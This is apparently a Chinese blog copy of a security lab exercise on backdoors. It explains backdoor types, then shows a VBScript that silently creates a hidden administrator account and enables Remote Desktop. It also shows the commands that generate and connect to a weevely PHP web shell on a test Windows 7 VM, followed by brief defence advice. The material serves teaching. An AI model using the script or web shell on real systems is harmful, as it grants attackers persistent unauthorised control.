主頁 > 企業開發 > 后門

后門

2021-10-22 06:29:38 企業開發

一、實驗目的

  1. 理解后門的定義與分類

  2. 掌握后門的操作

  3. 學會防范后門

二、實驗環境

  1. 系統環境:Windows環境,kail環境

  2. 軟體工具:telnetDoor,weevely

三、實驗原理

1. 后門的定義

最早的后門是由系統開發人員為自己留下入口而安裝的,而今天,并非開發人員將后門裝入自己設計的程式中,而是大多數攻擊者將后門裝入他人開發和維護的系統中,通過使用這樣的后門,攻擊者可以很輕松地獲得系統的訪問權,進而獲得系統的控制權,為了更加明確,我們給出后門的以下定義:

后門是一個允許攻擊者繞過系統中常規安全控制機制的程式,它按照攻擊者自己的意愿.提供通道

有許多不同型別的后門,但每種都可以繞過系統的常規性安全檢測,使得攻擊者獲得進入系統的入口,例如:一個普通的用戶可能不得不輸入一個口令,這個口令每90天會變換一次,而有了后門,攻擊者可以用一個固定的口令而無需變換

有了植入系統的后門,攻擊者可能根本不需要提供任何口令就可以登錄到計算機,普通用戶可能被迫使用某個特別的加密協議訪問計算機,而攻擊者可以利用后門訪問那些使用完全不同協議的計算機,一旦安裝了后門,攻擊者如何訪問該邏輯單元完全取決于攻擊者自己,

許多人用特洛伊木馬或者簡單地用特洛伊來形容每個后門,這種將術語“后門”和特洛伊木馬混淆的做法是非常錯誤的,應該盡量避免,后門只是簡單地提供通道,而特洛伊木馬將自己偽裝成某個有用的程式,或者干脆將自己隱藏起來,不要將這些概念混為一談,如果一個程式僅提供后門通道,那么它只是一個后門;如果可以偽裝成一個有用的程式,那么它便是特洛伊木馬,當然,有的工具可以同時是后門和特洛伊木馬,但是,只有當攻擊者企圖將后門偽裝成某個有用程式時,它才可以稱為“特洛伊木馬”,我們用特洛伊木馬后門這一不太明確的概念定義這種工具,因為它們偽裝成某個友善的程式同時還提供訪問通道,利用這一完全定義將有助于人們理解后門與木馬的區別

2. 不同型別的后門通道

正如我們在前面定義中看到的一樣,后門的作用在于為攻擊者進入目標計算機提供通道,這個通道可能表現為不同形式,它取決于攻擊者的目的和所使用的特定后門型別,后門能夠為攻擊者提供許多種不同型別的訪問,包括以下幾種:
本地權限的提升:這類后門使得對系統有訪問權的攻擊者突然變換其權限等級成為管理員,有了這些超級用戶權限,攻擊者可以重新設定系統或訪問任何存盤在系統中的檔案
單個命令的遠程執行:利用這種型別的后門,攻擊者可以向目標計算機發送訊息,每次執行一個單獨的命令,后門執行攻擊者的命令并將其輸出回傳給攻擊者

遠程命令列解釋器訪問:正如我們所知的遠程 shell命令,這種型別的后門允許攻擊者通過網路快遞直接地鍵入受害計算機的命令提示,攻擊者可以利用命令列解釋器的所有特征,包括執行一個命令集合的能力撰寫腳本,選擇一些檔案進行操作,遠程 shell比簡單的單命令遠程執行要強大得多,因為它們可以模擬攻擊者對目標計算機的鍵盤有直接訪問權的情形

遠程控制Gul (RemoteControloftheGul):比將命令列解釋器弄混亂更甚,有些后門可以讓攻擊者看到目標計算機的GUI,控制滑鼠的移動,輸入對鍵盤的操作,這些都是通過網路實作的,有了對GUI的遠程控制,攻擊者可以看到受害者對計算機的所有操作,甚至遠程控制GUI

無論后門提供何種型別的訪問,我們都會發現這些方法的重點在于控制,后門使得攻擊者控制計算機,這一切通常是通過網路遠程實作的,有了裝入目標計算機的后門,攻擊者可以利用這種控制搜索計算機中的易感染檔案,改變存盤在系統中的任何資料,改裝計算機,甚至使系統癱瘓,利用后門,攻擊者可以像受害者計算機本身的管理員一樣對其進行同樣的控制,更有甚者,攻擊者可以通過Internet在世界的任何地方實作該控制

攻擊者可以自己植入后門,通過某種普通的開發技術擁有系統的初始入口,例如緩沖區溢位或者典型的系統錯誤配置,一旦攻擊者闖入一個目標計算機,通常要做的第一件事就是裝入后門,從容地回傳到受害系統

另外,攻擊者也可以利用一個自動化的程式安裝后門,例如病毒、蠕蟲和惡意移動代碼,通過它們攻擊者可以探查到通向目標計算機系統的通道并打開一個后門,為攻擊者提供對系統的完全控制

安裝后門的最后一種方法是欺騙受害者自己安裝,攻擊者可能會通過E-mail向受害者發

一個程式或者利用遠程檔案共享能力將這樣的程式寫入受害者的硬碟,如果攻擊者可以利用某個看似不錯的程式騙得用戶的信任,他們可能上當將后門裝入自己的計算機,這些用戶很少會意識到安裝了攻擊者的惡意代碼,他們已經為攻擊者提供了對其計算機的完全控制

后門是在安裝了后門程式的用戶或攻擊者允許的前提下運行的,注意到這一點非常重要,如果一個攻擊者在目標系統中獲得超級用戶權限,攻擊者安裝的后門將以這些強有力的權限運行,類似地,如果攻擊者只能欺騙具有有限權限的低級用戶安裝后門,攻擊者對于該目標計算機而言,也就只有這個用戶所擁有的有限權限,因此,后門為攻擊者提供的對該系統的控制取決于安裝該后門用戶的權限等級

四、實驗步驟

1. 遠程控制工具telnetDoor

在Windows7虛擬機cmd命令控制臺輸入netstat -a命令,觀察埠9527并沒有被開啟,如下如所示:

雙擊運行實驗檔案夾中的telnetDoor.exe 運行程式,將后門植入計算機,如下圖所示:

cmd命令控制臺再次輸入netstat -a命令,可以觀察到埠9527已經開啟即后門成功植入并運行,如下圖所示:

在本地電腦中,打開cmd命令操作界面,輸入telnet 192.168.70.133 9527,如下圖所示:

按下回車,開始遠程控制目標計算機,(可以對目標計算機進行任意命令列操作,例如查看目錄檔案、查看ARP快取表和查看行程串列等等),如下圖所示:


此時我們已經可以遠程操作Windows7,接下來我們撰寫一個后門程式使計算機自動添加一個用戶,方便我們后期隨時可以遠程到Windows7虛擬機上,代碼如下:

dim wshell
set wshell=createobject("wscript.shell")
wshell.run"cmd /c net user backdoor houmen /add",vbhide
wshell.run"cmd /c net localgroup administrators backdoor /add",vbhide
wshell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",0,"REG_DWORD"
set wshell=nothing
wscript.quit

將上面代碼復制到.txt檔案后保存為system2.vbs可執行檔案,如下圖所示:

雙擊執行system2.vbs程式,打開cmd輸入netstat -ano 查看程式是否正常執行了,如下圖所示:

執行前:

執行后:系統自動開啟了3389遠程埠

系統自動添加了一個backdoor用戶,如下圖所示:(此時說明我們撰寫的后門代碼已經執行成功了)

接下來我們開始驗證是否能正常遠程到Windows7虛擬機上,在本地主機上使用mstsc命令點擊確定進行遠程連接Windows7虛擬機,如下圖所示:

在遠程桌面連接內輸入Windows7的IP地址192.168.70.133點擊連接,如下圖所示:

然后輸入剛剛我們在system2.vbs程式留的后門用戶名和密碼點擊確定,如下圖所示:


此時我們已經成功使用遠程桌面連接到了Windows7虛擬機上

2. 使用kali中的中國菜刀weevely工具

在Windows7虛擬機上搭建服務器,開啟wamp服務器功能

開啟kali的weevely功能命令:weevely generate admin /tmp/shell.php//生成一個名為shell.php的后門檔案,密碼是admin,如下圖所示:

把生成的檔案shell.php通過任何手段將它復制到Windows7虛擬機中的網站根目錄C:\wamp\www下,如下圖所示:

回傳到kali中進行命令連接Windows7,命令:weevely http://192.168.70.133/shell.php admin ,如下圖所示:

在終端中使用system_info命令遠程查看Windows7虛擬機的系統資訊,如下圖所示:


此時我們已經全部完成攻擊!

五、后門攻擊防范

首先要關閉本機不用的埠或只允許指定的埠訪問;其次要使用專殺木馬的軟體,為了有效地防范木馬后門;第三是要學會對行程操作,時時注意系統運行狀況,看看是否有一些不明行程正運行并及時地將不明行程終止掉,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/330047.html

標籤:訊息安全

上一篇:Jenkins和GitLab集成的URL問題

下一篇:如何查找Visual Studio Code中的內置命令并通過executeCommand來執行

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • IEEE1588PTP在數字化變電站時鐘同步方面的應用

    IEEE1588ptp在數字化變電站時鐘同步方面的應用 京準電子科技官微——ahjzsz 一、電力系統時間同步基本概況 隨著對IEC 61850標準研究的不斷深入,國內外學者提出基于IEC61850通信標準體系建設數字化變電站的發展思路。數字化變電站與常規變電站的顯著區別在于程序層傳統的電流/電壓互 ......

    uj5u.com 2020-09-10 03:51:52 more
  • HTTP request smuggling CL.TE

    CL.TE 簡介 前端通過Content-Length處理請求,通過反向代理或者負載均衡將請求轉發到后端,后端Transfer-Encoding優先級較高,以TE處理請求造成安全問題。 檢測 發送如下資料包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 ......

    uj5u.com 2020-09-10 03:52:11 more
  • 網路滲透資料大全單——漏洞庫篇

    網路滲透資料大全單——漏洞庫篇漏洞庫 NVD ——美國國家漏洞庫 →http://nvd.nist.gov/。 CERT ——美國國家應急回應中心 →https://www.us-cert.gov/ OSVDB ——開源漏洞庫 →http://osvdb.org Bugtraq ——賽門鐵克 →ht ......

    uj5u.com 2020-09-10 03:52:15 more
  • 京準講述NTP時鐘服務器應用及原理

    京準講述NTP時鐘服務器應用及原理京準講述NTP時鐘服務器應用及原理 安徽京準電子科技官微——ahjzsz 北斗授時原理 授時是指接識訓通過某種方式獲得本地時間與北斗標準時間的鐘差,然后調整本地時鐘使時差控制在一定的精度范圍內。 衛星導航系統通常由三部分組成:導航授時衛星、地面檢測校正維護系統和用戶 ......

    uj5u.com 2020-09-10 03:52:25 more
  • 利用北斗衛星系統設計NTP網路時間服務器

    利用北斗衛星系統設計NTP網路時間服務器 利用北斗衛星系統設計NTP網路時間服務器 安徽京準電子科技官微——ahjzsz 概述 NTP網路時間服務器是一款支持NTP和SNTP網路時間同步協議,高精度、大容量、高品質的高科技時鐘產品。 NTP網路時間服務器設備采用冗余架構設計,高精度時鐘直接來源于北斗 ......

    uj5u.com 2020-09-10 03:52:35 more
  • 詳細解讀電力系統各種對時方式

    詳細解讀電力系統各種對時方式 詳細解讀電力系統各種對時方式 安徽京準電子科技官微——ahjzsz,更多資料請添加VX 衛星同步時鐘是我京準公司開發研制的應用衛星授時時技術的標準時間顯示和發送的裝置,該裝置以M國全球定位系統(GLOBAL POSITIONING SYSTEM,縮寫為GPS)或者我國北 ......

    uj5u.com 2020-09-10 03:52:45 more
  • 如何保證外包團隊接入企業內網安全

    不管企業規模的大小,只要企業想省錢,那么企業的某些服務就一定會采用外包的形式,然而看似美好又經濟的策略,其實也有不好的一面。下面我通過安全的角度來聊聊使用外包團的安全隱患問題。 先看看什么服務會使用外包的,最常見的就是話務/客服這種需要大量重復性、無技術性的服務,或者是一些銷售外包、特殊的職能外包等 ......

    uj5u.com 2020-09-10 03:52:57 more
  • PHP漏洞之【整型數字型SQL注入】

    0x01 什么是SQL注入 SQL是一種注入攻擊,通過前端帶入后端資料庫進行惡意的SQL陳述句查詢。 0x02 SQL整型注入原理 SQL注入一般發生在動態網站URL地址里,當然也會發生在其它地發,如登錄框等等也會存在注入,只要是和資料庫打交道的地方都有可能存在。 如這里http://192.168. ......

    uj5u.com 2020-09-10 03:55:40 more
  • [GXYCTF2019]禁止套娃

    git泄露獲取原始碼 使用GET傳參,引數為exp 經過三層過濾執行 第一層過濾偽協議,第二層過濾帶引數的函式,第三層過濾一些函式 preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'] (?R)參考當前正則運算式,相當于匹配函式里的引數 因此傳遞 ......

    uj5u.com 2020-09-10 03:56:07 more
  • 等保2.0實施流程

    流程 結論 ......

    uj5u.com 2020-09-10 03:56:16 more
最新发布
  • 使用Django Rest framework搭建Blog

    在前面的Blog例子中我們使用的是GraphQL, 雖然GraphQL的使用處于上升趨勢,但是Rest API還是使用的更廣泛一些. 所以還是決定回到傳統的rest api framework上來, Django rest framework的官網上給了一個很好用的QuickStart, 我參考Qu ......

    uj5u.com 2023-04-20 08:17:54 more
  • 記錄-new Date() 我忍你很久了!

    這里給大家分享我在網上總結出來的一些知識,希望對大家有所幫助 大家平時在開發的時候有沒被new Date()折磨過?就是它的諸多怪異的設定讓你每每用的時候,都可能不小心踩坑。造成程式意外出錯,卻一下子找不到問題出處,那叫一個煩透了…… 下面,我就列舉它的“四宗罪”及應用思考 可惡的四宗罪 1. Sa ......

    uj5u.com 2023-04-20 08:17:47 more
  • 使用Vue.js實作文字跑馬燈效果

    實作文字跑馬燈效果,首先用到 substring()截取 和 setInterval計時器 clearInterval()清除計時器 效果如下: 實作代碼如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta ......

    uj5u.com 2023-04-20 08:12:31 more
  • JavaScript 運算子

    JavaScript 運算子/運算子 在 JavaScript 中,有一些運算子可以使代碼更簡潔、易讀和高效。以下是一些常見的運算子: 1、可選鏈運算子(optional chaining operator) ?.是可選鏈運算子(optional chaining operator)。?. 可選鏈操 ......

    uj5u.com 2023-04-20 08:02:25 more
  • CSS—相對單位rem

    一、概述 rem是一個相對長度單位,它的單位長度取決于根標簽html的字體尺寸。rem即root em的意思,中文翻譯為根em。瀏覽器的文本尺寸一般默認為16px,即默認情況下: 1rem = 16px rem布局原理:根據CSS媒體查詢功能,更改根標簽的字體尺寸,實作rem單位隨螢屏尺寸的變化,如 ......

    uj5u.com 2023-04-20 08:02:21 more
  • 我的第一個NPM包:panghu-planebattle-esm(胖虎飛機大戰)使用說明

    好家伙,我的包終于開發完啦 歡迎使用胖虎的飛機大戰包!! 為你的主頁添加色彩 這是一個有趣的網頁小游戲包,使用canvas和js開發 使用ES6模塊化開發 效果圖如下: (覺得圖片太sb的可以自己改) 代碼已開源!! Git: https://gitee.com/tang-and-han-dynas ......

    uj5u.com 2023-04-20 08:01:50 more
  • 如何在 vue3 中使用 jsx/tsx?

    我們都知道,通常情況下我們使用 vue 大多都是用的 SFC(Signle File Component)單檔案組件模式,即一個組件就是一個檔案,但其實 Vue 也是支持使用 JSX 來撰寫組件的。這里不討論 SFC 和 JSX 的好壞,這個仁者見仁智者見智。本篇文章旨在帶領大家快速了解和使用 Vu ......

    uj5u.com 2023-04-20 08:01:37 more
  • 【Vue2.x原始碼系列06】計算屬性computed原理

    本章目標:計算屬性是如何實作的?計算屬性快取原理以及洋蔥模型的應用?在初始化Vue實體時,我們會給每個計算屬性都創建一個對應watcher,我們稱之為計算屬性watcher ......

    uj5u.com 2023-04-20 08:01:31 more
  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:01:10 more
  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:00:32 more